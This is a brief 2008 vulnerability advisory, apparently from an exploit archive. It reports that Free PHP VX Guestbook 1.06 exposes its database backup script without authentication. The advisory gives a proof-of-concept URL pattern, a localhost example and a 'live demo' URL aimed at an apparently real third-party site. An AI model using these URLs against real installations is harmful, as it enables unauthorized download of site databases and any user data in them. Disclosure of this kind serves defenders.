Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability

2008-09-13 04:01:04

###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
################################################################################################

[+] Arbitrary Backup Database

Follow the example and the database download will begin :

[dbname]_db_backup.sql


PoC :

http://[target]/[path]/admin/backupdb.php

Example :

http://127.0.0.1/book/admin/backupdb.php

Live Demo :

http://phpversion.com/book/admin/backupdb.php


################################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.